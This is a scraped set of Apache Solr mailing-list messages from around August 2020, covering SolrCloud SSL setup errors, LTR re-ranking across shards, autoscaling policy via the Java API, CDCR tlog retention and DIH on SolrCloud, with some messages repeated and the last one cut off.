INFO  - 2020-09-03 18:21:26.784; 
org.apache.solr.client.solrj.impl.ZkClientClusterStateProvider; Cluster at 
zk1:2181,zk2:2181,zk3:2181/solr ready

Re-using existing configuration directory mycollection



Creating new collection 'mycollection' using command:

https://Solr1:8983/solr/admin/collections?action=CREATE=mycollection=2=1=1=mycollection



ERROR: Failed to create collection 'mycollection' due to: 
{Solr2:8983_solr=org.apache.solr.client.solrj.SolrServerException:IOException 
occured when talking to server at: https://Solr2:8983/solr}

*I've attached logs at the bottom of this email.



QUESTIONS:

What am I doing wrong and how can I fix it?

Was I right to create separate certificates on each of the nodes (one cert on 
vm1, another cert on vm 2)?

Do I need to copy the certs for each node into the other (if so how)?



CONCLUSION

Thank you so much in advance and if there's any other information you need 
please let me know.

Victor

2020-09-03 18:15:35.240 INFO  
(zkCallback-5-thread-1-processing-n:Solr1:8983_solr) [   ] 
o.a.s.c.c.ZkStateReader Updated live nodes from ZooKeeper... (1) -> (2)
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] 
o.a.s.c.TransientSolrCoreCacheDefault Allocating transient cache for 2147483647 
transient cores
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156956818} status=0 QTime=23
2020-09-03 18:15:40.134 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=29
2020-09-03 18:15:40.171 INFO  (qtp401424608-13) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156956818 and sendToOCPQueue=true
2020-09-03 18:15:40.172 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156956818} status=0 QTime=1
2020-09-03 18:15:40.174 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=8
2020-09-03 18:15:58.225 INFO  (

SolrCloud (6.6.6) SSL Setup - Unable to create collection

2020-09-03 Thread Victor Kretzer
BACKGROUND: I'm attempting to setup SolrCloud (Solr 6.6.6) with an external 
zookeeper ensemble on Azure. I have three dedicated vms for the zookeeper 
ensemble and two for solr all running Ubuntu 18.04 LTS. I'm new to Solr (and 
Linux) and have been heavily relying on the Solr Ref Guide 6.6, most recently 
the following section on enabling ssl:



https://lucene.apache.org/solr/guide/6_6/enabling-ssl.html



So far I have:

Installed and setup zookeeper

Installed Solr (using install_solr_service.sh script) on both vms.

Followed the steps under Basic SSL Setup, generating certificates on each of 
the nodes.

Set the cluster-wide property to https per the Configure Zookeeper section of 
SolrCloud in the document

Started both nodes and have been able to navigate to them in my browser with 
https



If I do bin/solr status I get:



Solr process 13106 running on port 8983

{

  "solr_home":"/opt/solr-6.6.6/cloud/test2",

  "version":"6.6.6 68fa249034ba8b273955f20097700dc2fbb7a800 - ishan - 
2019-03-29 09:13:13",

  "startTime":"2020-09-03T18:15:34.092Z",

  "uptime":"0 days, 0 hours, 43 minutes, 29 seconds",

  "memory":"52.7 MB (%10.7) of 490.7 MB",

  "cloud":{

"ZooKeeper":"zk1:2181,zk2:2181,zk3:2181/solr",

"liveNodes":"2",

"collections":"0"}}







THE ISSUE

When I try to create a collection using the steps outlined in the above 
document, I get the following error:



azureuser@solr-node-01-test:/opt/solr$ sudo bin/solr create -c mycollection 
-shards 2 -force



Connecting to ZooKeeper at zk1:2181,zk2:2181,zk3:2181/solr ...

INFO  - 2020-09-03 18:21:26.784; 
org.apache.solr.client.solrj.impl.ZkClientClusterStateProvider; Cluster at 
zk1:2181,zk2:2181,zk3:2181/solr ready

Re-using existing configuration directory mycollection



Creating new collection 'mycollection' using command:

https://Solr1:8983/solr/admin/collections?action=CREATE=mycollection=2=1=1=mycollection



ERROR: Failed to create collection 'mycollection' due to: 
{Solr2:8983_solr=org.apache.solr.client.solrj.SolrServerException:IOException 
occured when talking to server at: https://Solr2:8983/solr}

*I've attached logs at the bottom of this email.



QUESTIONS:

What am I doing wrong and how can I fix it?

Was I right to create separate certificates on each of the nodes (one cert on 
vm1, another cert on vm 2)?

Do I need to copy the certs for each node into the other (if so how)?



CONCLUSION

Thank you so much in advance and if there's any other information you need 
please let me know.

Victor

2020-09-03 18:15:35.240 INFO  
(zkCallback-5-thread-1-processing-n:Solr1:8983_solr) [   ] 
o.a.s.c.c.ZkStateReader Updated live nodes from ZooKeeper... (1) -> (2)
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] 
o.a.s.c.TransientSolrCoreCacheDefault Allocating transient cache for 2147483647 
transient cores
2020-09-03 18:15:40.124 INFO  (qtp401424608-45) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156956818} status=0 QTime=23
2020-09-03 18:15:40.134 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=29
2020-09-03 18:15:40.171 INFO  (qtp401424608-13) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156956818 and sendToOCPQueue=true
2020-09-03 18:15:40.172 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156956818} status=0 QTime=1
2020-09-03 18:15:40.174 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156956818} 
status=0 QTime=8
2020-09-03 18:15:58.225 INFO  (qtp401424608-14) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/cores 
params={indexInfo=false=json&_=1599156974989} status=0 QTime=0
2020-09-03 18:15:58.231 INFO  (qtp401424608-13) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156974989} 
status=0 QTime=7
2020-09-03 18:15:58.258 INFO  (qtp401424608-20) [   ] 
o.a.s.h.a.CollectionsHandler Invoked Collection Action :list with params 
action=LIST=json&_=1599156974989 and sendToOCPQueue=true
2020-09-03 18:15:58.258 INFO  (qtp401424608-20) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/collections 
params={action=LIST=json&_=1599156974989} status=0 QTime=0
2020-09-03 18:15:58.263 INFO  (qtp401424608-21) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json&_=1599156974989} 
status=0 QTime=7
2020-09-03 18:19:38.661 INFO  (qtp401424608-16) [   ] o.a.s.s.HttpSolrCall 
[admin] webapp=null path=/admin/info/system params={wt=json} status=0 QTime=6
202

Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Jörg,

Thanks for this link -- one of our search engineers started looking into
this, because the issue with sorting in a federated setting concerns
non-LTR based ranking as well.
In particular, it becomes visible in cursor based pagination in collections
that have shards with replicas. At any given time a replica can be behind
in stats and that causes issues in sorting and pagination.

I really hope LTR documentation can be updated with notes on handling
federated searches, because this should affect many Solr LTR users.

On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:

> Maybe this can help you?
>
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
>
> On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:
>
> > HI all,
> >
> > On our current master/slave setup (no cloud), we use a a custom sorting
> > function to get the first pass results (using the sort param), and then
> we
> > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> the
> > topN, after sorting has completed and the order is correct.
> >
> > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > shards, this does not seem to work as expected. To my understanding, Solr
> > collects the reranked results from the shards back on a single node to
> > merge them, and then tries to re-apply sorting.
> >
> > We would expect the results to at least follow the sorting formula, even
> if
> > this is not what we want. But this still not even the case, as the
> > combination of the two (sorting + reranking) results in erratic ordering.
> >
> > Example result, where $sort_score is the sorting formula output, and
> score
> > is the LTR re-ranked output:
> >
> > {"id": "152",
> > "$sort_score": 17.38543,
> > "score": 0.22140852
> > },
> > {"id": "2016",
> > "$sort_score": 14.612957,
> > "score": 0.19214153
> > },
> > { "id": "1523",
> > "$sort_score": 14.4093275,
> > "score": 0.26738763
> > },
> > { "id": "6704",
> > "$sort_score": 13.956842,
> > "score": 0.17357588
> > },
> > { "id": "6512",
> > "$sort_score": 14.43907,
> > "score": 0.11575622
> > },
> >
> > We also tried with other simple re-rank queries apart from LTR, and the
> > issue persisted.
> >
> > Could someone please help troubleshoot? Ideally, we would want to have
> the
> > re-rank results merged on the single node, and not re-apply sorting.
> >
> > Thank you!
> >
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Spyros,

Thanks for sharing! This is certainly subject for a test, but I think that
LTR plugin could be modified to rerank the documents on the merging node.
For instance, if instead of solr cloud endpoint, you use a separate solr
instance to route and aggregate the federated results, the reranking could
happen only once inside that instance.

Another approach with score normalization is mentioned here:
https://sease.io/2016/10/apache-solr-learning-to-rank-better-part-4.html

On Fri, Aug 28, 2020 at 7:39 PM Spyros Kapnissis  wrote:

> Hi Dmitry,
>
> No, we were not able to solve the sorting/re-ranking issue. In the end we
> migrated the custom sorting formula to using the 'q' param instead of
> 'sort' to get back the results sorted by score as expected.
>
> That mostly solved our issues with inconsistent Solr scores. Maybe sorting
> and re-ranking are conflicting concepts.
>
> Hope this helps.
>
>
> On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:
>
> > Maybe this can help you?
> >
> >
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
> >
> > On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis 
> wrote:
> >
> > > HI all,
> > >
> > > On our current master/slave setup (no cloud), we use a a custom sorting
> > > function to get the first pass results (using the sort param), and then
> > we
> > > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> > the
> > > topN, after sorting has completed and the order is correct.
> > >
> > > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > > shards, this does not seem to work as expected. To my understanding,
> Solr
> > > collects the reranked results from the shards back on a single node to
> > > merge them, and then tries to re-apply sorting.
> > >
> > > We would expect the results to at least follow the sorting formula,
> even
> > if
> > > this is not what we want. But this still not even the case, as the
> > > combination of the two (sorting + reranking) results in erratic
> ordering.
> > >
> > > Example result, where $sort_score is the sorting formula output, and
> > score
> > > is the LTR re-ranked output:
> > >
> > > {"id": "152",
> > > "$sort_score": 17.38543,
> > > "score": 0.22140852
> > > },
> > > {"id": "2016",
> > > "$sort_score": 14.612957,
> > > "score": 0.19214153
> > > },
> > > { "id": "1523",
> > > "$sort_score": 14.4093275,
> > > "score": 0.26738763
> > > },
> > > { "id": "6704",
> > > "$sort_score": 13.956842,
> > > "score": 0.17357588
> > > },
> > > { "id": "6512",
> > > "$sort_score": 14.43907,
> > > "score": 0.11575622
> > > },
> > >
> > > We also tried with other simple re-rank queries apart from LTR, and the
> > > issue persisted.
> > >
> > > Could someone please help troubleshoot? Ideally, we would want to have
> > the
> > > re-rank results merged on the single node, and not re-apply sorting.
> > >
> > > Thank you!
> > >
> >
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Spyros Kapnissis
Hi Dmitry,

No, we were not able to solve the sorting/re-ranking issue. In the end we
migrated the custom sorting formula to using the 'q' param instead of
'sort' to get back the results sorted by score as expected.

That mostly solved our issues with inconsistent Solr scores. Maybe sorting
and re-ranking are conflicting concepts.

Hope this helps.


On Fri, Aug 28, 2020 at 4:28 PM Jörn Franke  wrote:

> Maybe this can help you?
>
> https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf
>
> On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:
>
> > HI all,
> >
> > On our current master/slave setup (no cloud), we use a a custom sorting
> > function to get the first pass results (using the sort param), and then
> we
> > use LTR for re-ranking. This works fine, i.e. re-ranking is applied on
> the
> > topN, after sorting has completed and the order is correct.
> >
> > However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> > shards, this does not seem to work as expected. To my understanding, Solr
> > collects the reranked results from the shards back on a single node to
> > merge them, and then tries to re-apply sorting.
> >
> > We would expect the results to at least follow the sorting formula, even
> if
> > this is not what we want. But this still not even the case, as the
> > combination of the two (sorting + reranking) results in erratic ordering.
> >
> > Example result, where $sort_score is the sorting formula output, and
> score
> > is the LTR re-ranked output:
> >
> > {"id": "152",
> > "$sort_score": 17.38543,
> > "score": 0.22140852
> > },
> > {"id": "2016",
> > "$sort_score": 14.612957,
> > "score": 0.19214153
> > },
> > { "id": "1523",
> > "$sort_score": 14.4093275,
> > "score": 0.26738763
> > },
> > { "id": "6704",
> > "$sort_score": 13.956842,
> > "score": 0.17357588
> > },
> > { "id": "6512",
> > "$sort_score": 14.43907,
> > "score": 0.11575622
> > },
> >
> > We also tried with other simple re-rank queries apart from LTR, and the
> > issue persisted.
> >
> > Could someone please help troubleshoot? Ideally, we would want to have
> the
> > re-rank results merged on the single node, and not re-apply sorting.
> >
> > Thank you!
> >
>


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Jörn Franke
Maybe this can help you?
https://lucene.apache.org/solr/guide/7_5/distributed-requests.html#configuring-statscache-distributed-idf

On Mon, May 11, 2020 at 9:24 AM Spyros Kapnissis  wrote:

> HI all,
>
> On our current master/slave setup (no cloud), we use a a custom sorting
> function to get the first pass results (using the sort param), and then we
> use LTR for re-ranking. This works fine, i.e. re-ranking is applied on the
> topN, after sorting has completed and the order is correct.
>
> However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> shards, this does not seem to work as expected. To my understanding, Solr
> collects the reranked results from the shards back on a single node to
> merge them, and then tries to re-apply sorting.
>
> We would expect the results to at least follow the sorting formula, even if
> this is not what we want. But this still not even the case, as the
> combination of the two (sorting + reranking) results in erratic ordering.
>
> Example result, where $sort_score is the sorting formula output, and score
> is the LTR re-ranked output:
>
> {"id": "152",
> "$sort_score": 17.38543,
> "score": 0.22140852
> },
> {"id": "2016",
> "$sort_score": 14.612957,
> "score": 0.19214153
> },
> { "id": "1523",
> "$sort_score": 14.4093275,
> "score": 0.26738763
> },
> { "id": "6704",
> "$sort_score": 13.956842,
> "score": 0.17357588
> },
> { "id": "6512",
> "$sort_score": 14.43907,
> "score": 0.11575622
> },
>
> We also tried with other simple re-rank queries apart from LTR, and the
> issue persisted.
>
> Could someone please help troubleshoot? Ideally, we would want to have the
> re-rank results merged on the single node, and not re-apply sorting.
>
> Thank you!
>


Re: Ranking issue when combining sorting and re-ranking on SolrCloud (multiple shards)

2020-08-28 Thread Dmitry Kan
Hi Spyros,

Did you manage to solve this issue and if yes, can you please share your
solution?

On Mon, May 11, 2020 at 10:24 AM Spyros Kapnissis  wrote:

> HI all,
>
> On our current master/slave setup (no cloud), we use a a custom sorting
> function to get the first pass results (using the sort param), and then we
> use LTR for re-ranking. This works fine, i.e. re-ranking is applied on the
> topN, after sorting has completed and the order is correct.
>
> However, as we are migrating on SolrCloud (version 7.3.1) with multiple
> shards, this does not seem to work as expected. To my understanding, Solr
> collects the reranked results from the shards back on a single node to
> merge them, and then tries to re-apply sorting.
>
> We would expect the results to at least follow the sorting formula, even if
> this is not what we want. But this still not even the case, as the
> combination of the two (sorting + reranking) results in erratic ordering.
>
> Example result, where $sort_score is the sorting formula output, and score
> is the LTR re-ranked output:
>
> {"id": "152",
> "$sort_score": 17.38543,
> "score": 0.22140852
> },
> {"id": "2016",
> "$sort_score": 14.612957,
> "score": 0.19214153
> },
> { "id": "1523",
> "$sort_score": 14.4093275,
> "score": 0.26738763
> },
> { "id": "6704",
> "$sort_score": 13.956842,
> "score": 0.17357588
> },
> { "id": "6512",
> "$sort_score": 14.43907,
> "score": 0.11575622
> },
>
> We also tried with other simple re-rank queries apart from LTR, and the
> issue persisted.
>
> Could someone please help troubleshoot? Ideally, we would want to have the
> re-rank results merged on the single node, and not re-apply sorting.
>
> Thank you!
>


-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Issues deploying LTR into SolrCloud

2020-08-26 Thread Dmitry Kan
Hello,

Just noticed my numbering is off, should be:

1. Deploy a feature store from a JSON file to each collection.
2. Reload all collections as advised in the documentation:
https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
3. Deploy the related model from a JSON file.
4. Reload all collections again.


An update: applying this process twice I was able to fix the issue.
However, it required "patching" individual collections, while reloading was
done for all collections at once. I'm not sure this is very transparent to
the user: maybe show the model deployment status per collection in the
admin UI?

Thanks,

Dmitry

On Tue, Aug 25, 2020 at 6:20 PM Dmitry Kan  wrote:

> Hi,
>
> There is a recent thread "Replication of Solr Model and feature store" on
> deploying LTR feature store and model into a master/slave Solr topology.
>
> I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
> collections have shards with replicas. This is the process I've been
> following:
>
> 1. Deploy a feature store from a JSON file to each collection.
> 2. Reload all collections as advised in the documentation:
> https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
> 3. Deploy the related model from a JSON file.
> 3. Reload all collections again.
>
>
> The problem is that even after reloading the collections, shard replicas
> continue to not have the model:
>
> Error from server at
> http://server1:8983/solr/collection1_shard1_replica_n1: cannot find model
> 'model_name'
>
> What is the proper way to address this issue and can it be potentially a
> bug in SolrCloud?
>
> Is there any workaround I can try, like saving the feature store and model
> JSON files into the collection config path and creating the SolrCloud from
> there?
>
> Thanks,
>
> Dmitry
>
> --
> Dmitry Kan
> Luke Toolbox: http://github.com/DmitryKey/luke
> Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
> Twitter: http://twitter.com/dmitrykan
> SemanticAnalyzer: https://semanticanalyzer.info
>
>


Issues deploying LTR into SolrCloud

2020-08-25 Thread Dmitry Kan
Hi,

There is a recent thread "Replication of Solr Model and feature store" on
deploying LTR feature store and model into a master/slave Solr topology.

I'm facing an issue of deploying into SolrCloud (solr 7.5.0), where
collections have shards with replicas. This is the process I've been
following:

1. Deploy a feature store from a JSON file to each collection.
2. Reload all collections as advised in the documentation:
https://lucene.apache.org/solr/guide/7_5/learning-to-rank.html#applying-changes
3. Deploy the related model from a JSON file.
3. Reload all collections again.


The problem is that even after reloading the collections, shard replicas
continue to not have the model:

Error from server at http://server1:8983/solr/collection1_shard1_replica_n1:
cannot find model 'model_name'

What is the proper way to address this issue and can it be potentially a
bug in SolrCloud?

Is there any workaround I can try, like saving the feature store and model
JSON files into the collection config path and creating the SolrCloud from
there?

Thanks,

Dmitry

-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com and https://medium.com/@dmitry.kan
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using the autoscaling Java API

2020-08-24 Thread Howard Gonzalez
Good morning! To add more context on the question, I can successfully use the 
Java API to build the list of new Clauses. However, the problem that I have is 
that I don't know how to "write" those changes back to solr using the Java API. 
I see there's a writeMap method in the Policy class however I can't find how to 
use it.

Thanks in advance


From: Howard Gonzalez 
Sent: Friday, August 21, 2020 12:45 PM
To: solr-user@lucene.apache.org 
Subject: How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using 
the autoscaling Java API

Hello. I am trying to use the autoscaling Java API to write some cluster policy 
changes to a Zookeeper/SolrCloud cluster. However, I can't find the right way 
to do it. I can get all the autoscaling cluster policy clauses using:

autoScalingConfig.getPolicy.getClusterPolicy

However, after getting all the right List of clauses, I don't know how to write 
those changes to the Zookeeper/Solr cluster using the Java API.

Any guidance please? I know I can use the HTTP solr client to send a json 
request, but just wondering how to do it using the provided Java API.

Thanks in advance


How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using the autoscaling Java API

2020-08-21 Thread Howard Gonzalez
Hello. I am trying to use the autoscaling Java API to write some cluster policy 
changes to a Zookeeper/SolrCloud cluster. However, I can't find the right way 
to do it. I can get all the autoscaling cluster policy clauses using:

autoScalingConfig.getPolicy.getClusterPolicy

However, after getting all the right List of clauses, I don't know how to write 
those changes to the Zookeeper/Solr cluster using the Java API.

Any guidance please? I know I can use the HTTP solr client to send a json 
request, but just wondering how to do it using the provided Java API.

Thanks in advance


Re: Solrcloud tlog are not deleted

2020-08-14 Thread Jérôme ROUCOU
Hello,

Thanks for your reply.

Yes, the CDCR buffer is disable when we check it.

We finally found that the increase of tlog files was due to the version of
Zookeeper used. We re-installed Zookeeper in the same version as the one
embedded by Solr, and this fixed the problem of non-deleted tlogs.


Regards,
Jérôme


Le mar. 11 août 2020 à 12:48, Dominique Bejean 
a écrit :

> Hi,
>
> Did you disable CDCR buffer ?
> solr//cdcr?action=DISABLEBUFFER
>
> You can check with "cdcr?action=STATUS"
>
> Regards
>
> Dominique
>
>
> Le mar. 11 août 2020 à 10:57, Michel Bamouni  a
> écrit :
>
>> Hello,
>>
>>
>> We had setup a synchronization between our solr instances on 2
>> datacenters by using  the CDCR.
>> until now, every thing worked fine but after an upgrade from solr 7.3 to
>> solr 7.7, we are facing an issue.
>> Indeed, our tlog files are not deleted even if we see the new values on
>> the  two solr.
>> It is like that the hard commit doesn't occur.
>> In our solrconfig.xml file, we had configure the autocommit as below :
>>
>>
>> 
>>   ${solr.autoCommit.maxTime:15000}
>>   false
>> 
>>
>>
>> and the softautocommit looks like that:
>>
>> 
>>   ${solr.autoSoftCommit.maxTime:-1}
>> 
>>
>>
>> if someone has already meet this issue, I'm looking for your return.
>>
>>
>> Best regards,
>>
>>
>> Michel
>>
>>


Re: DIH on SolrCloud

2020-08-14 Thread Jan Høydahl
DIH should run fine from any node. It sends update requests as any other client,
and those are routed to the leader, wherever it is. It could be problematic if 
node 2
gets overloaded by both doing DIH work, Overseer work and perhaps shard leader
work, and an overloaded node gets into all kind of problems with Zookeeper etc.

First thing I’d do, while prearing to replace DIH with something else outside 
your
cluster, is to get up to a recent Solr version. Version 4.10 has a lot of known 
issues
wrt SolrCloud stability.

Jan

> 14. aug. 2020 kl. 03:55 skrev Issei Nishigata :
> 
> Thank you for your quick reply.
> Can I make sure that the indexing isn't conducted on the node where the DIH
> executed but conducted on the Leader node, right?
> 
> As far as I have seen a log, there are errors: the failed establishment of
> connection occurred from Node2 on the state of Replica on running DIH to
> Node9 where on the state of Replica.
> Therefore, for my understanding, I thought there would be errors when the
> DIH was implemented at the Node2 and trying to forward a tlog to Node9.
> 
> Unless Node9 receives the tlog, if Node1 as Leader receives the tlog, I do
> believe there are no worries because Node9 is synchronised with Node1.
> But if Node1 as Leader cannot receive the tlog, Replica might be
> synchronised to the Leader soon and that makes me a problematic issue.
> I want to try to find out the cause as I will check all log files of all
> servers through, but could you give me your comment for my understanding of
> the indexing architecture on SolrCloud, please?
> 
> 
> Thanks,
> Issei
> 
> 2020年8月14日(金) 0:33 Jörn Franke :
> 
>> DIH is deprecated in current Solr versions. The general recommendation is
>> to do processing outside the Solr server and use the update handler (the
>> normal one, not Cell) to add documents to the index. So you should avoid
>> using it as it is not future proof .
>> 
>> If you need more Time to migrate to a non-DIH solution:
>> I recommend to look at all log files of all servers to find the real error
>> behind the issue. If you trigger in Solr cloud mode DIH from node 2 that
>> does not mean it is executed there !
>> 
>> What could to wrong:
>> Other nodes do not have access to files/database or there is a parsing
>> error or a script error.
>> 
>>> Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
>>> 
>>> Hi, All
>>> 
>>> I'm using Solr4.10 with SolrCloud mode.
>>> I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I
>> will
>>> call this Node1 to Node10 for convenience)
>>> -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
>>> Indexing always uses DIH of Node2. Therefore, DIH may be executed when
>>> Node2 is Leader or Replica.
>>> Node2 is not forcibly set to Leader when DIH is executed.
>>> 
>>> At one point, when Node2 executed DIH in the Replica state, the following
>>> error in Node9 occurred.
>>> 
>>> 
>> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
>>> - org.apache.solr.client.solrj.SolrServerException: IOException occured
>>> when talking to server at:
>> http://samplehost:8983/solr/test_shard1_replica9
>>> 
>>> I think this is the error while sending data from Node2 to Node9. And
>> Node9
>>> couldn't respond for some reason.
>>> 
>>> The error occurs sometimes however it is not reproducible so that the
>>> investigation is troublesome.
>>> Is there any possible cause for this problem? I am worrying about if it
>> is
>>> doing Solr anti-pattern.
>>> The thing is, when running DIH by Node2 as Replica, the above error
>> occurs
>>> towards Node1 as Leader,
>>> then soon after, all the nodes might be returning to the index of the
>>> Node1.
>>> Do you think my understanding makes sense?
>>> 
>>> If using DIH on SolrCloud is not recommended, please let me know about
>> this.
>>> 
>>> Thanks,
>>> Issei
>> 



Re: DIH on SolrCloud

2020-08-13 Thread Issei Nishigata
Thank you for your quick reply.
Can I make sure that the indexing isn't conducted on the node where the DIH
executed but conducted on the Leader node, right?

As far as I have seen a log, there are errors: the failed establishment of
connection occurred from Node2 on the state of Replica on running DIH to
Node9 where on the state of Replica.
Therefore, for my understanding, I thought there would be errors when the
DIH was implemented at the Node2 and trying to forward a tlog to Node9.

Unless Node9 receives the tlog, if Node1 as Leader receives the tlog, I do
believe there are no worries because Node9 is synchronised with Node1.
But if Node1 as Leader cannot receive the tlog, Replica might be
synchronised to the Leader soon and that makes me a problematic issue.
I want to try to find out the cause as I will check all log files of all
servers through, but could you give me your comment for my understanding of
the indexing architecture on SolrCloud, please?


Thanks,
Issei

2020年8月14日(金) 0:33 Jörn Franke :

> DIH is deprecated in current Solr versions. The general recommendation is
> to do processing outside the Solr server and use the update handler (the
> normal one, not Cell) to add documents to the index. So you should avoid
> using it as it is not future proof .
>
> If you need more Time to migrate to a non-DIH solution:
> I recommend to look at all log files of all servers to find the real error
> behind the issue. If you trigger in Solr cloud mode DIH from node 2 that
> does not mean it is executed there !
>
> What could to wrong:
> Other nodes do not have access to files/database or there is a parsing
> error or a script error.
>
> > Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
> >
> > Hi, All
> >
> > I'm using Solr4.10 with SolrCloud mode.
> > I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I
> will
> > call this Node1 to Node10 for convenience)
> > -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
> > Indexing always uses DIH of Node2. Therefore, DIH may be executed when
> > Node2 is Leader or Replica.
> > Node2 is not forcibly set to Leader when DIH is executed.
> >
> > At one point, when Node2 executed DIH in the Replica state, the following
> > error in Node9 occurred.
> >
> >
> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
> > - org.apache.solr.client.solrj.SolrServerException: IOException occured
> > when talking to server at:
> http://samplehost:8983/solr/test_shard1_replica9
> >
> > I think this is the error while sending data from Node2 to Node9. And
> Node9
> > couldn't respond for some reason.
> >
> > The error occurs sometimes however it is not reproducible so that the
> > investigation is troublesome.
> > Is there any possible cause for this problem? I am worrying about if it
> is
> > doing Solr anti-pattern.
> > The thing is, when running DIH by Node2 as Replica, the above error
> occurs
> > towards Node1 as Leader,
> > then soon after, all the nodes might be returning to the index of the
> > Node1.
> > Do you think my understanding makes sense?
> >
> > If using DIH on SolrCloud is not recommended, please let me know about
> this.
> >
> > Thanks,
> > Issei
>


Re: DIH on SolrCloud

2020-08-13 Thread Jörn Franke
DIH is deprecated in current Solr versions. The general recommendation is to do 
processing outside the Solr server and use the update handler (the normal one, 
not Cell) to add documents to the index. So you should avoid using it as it is 
not future proof .

If you need more Time to migrate to a non-DIH solution:
I recommend to look at all log files of all servers to find the real error 
behind the issue. If you trigger in Solr cloud mode DIH from node 2 that does 
not mean it is executed there !

What could to wrong:
Other nodes do not have access to files/database or there is a parsing error or 
a script error.

> Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
> 
> Hi, All
> 
> I'm using Solr4.10 with SolrCloud mode.
> I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I will
> call this Node1 to Node10 for convenience)
> -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
> Indexing always uses DIH of Node2. Therefore, DIH may be executed when
> Node2 is Leader or Replica.
> Node2 is not forcibly set to Leader when DIH is executed.
> 
> At one point, when Node2 executed DIH in the Replica state, the following
> error in Node9 occurred.
> 
> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
> - org.apache.solr.client.solrj.SolrServerException: IOException occured
> when talking to server at: http://samplehost:8983/solr/test_shard1_replica9
> 
> I think this is the error while sending data from Node2 to Node9. And Node9
> couldn't respond for some reason.
> 
> The error occurs sometimes however it is not reproducible so that the
> investigation is troublesome.
> Is there any possible cause for this problem? I am worrying about if it is
> doing Solr anti-pattern.
> The thing is, when running DIH by Node2 as Replica, the above error occurs
> towards Node1 as Leader,
> then soon after, all the nodes might be returning to the index of the
> Node1.
> Do you think my understanding makes sense?
> 
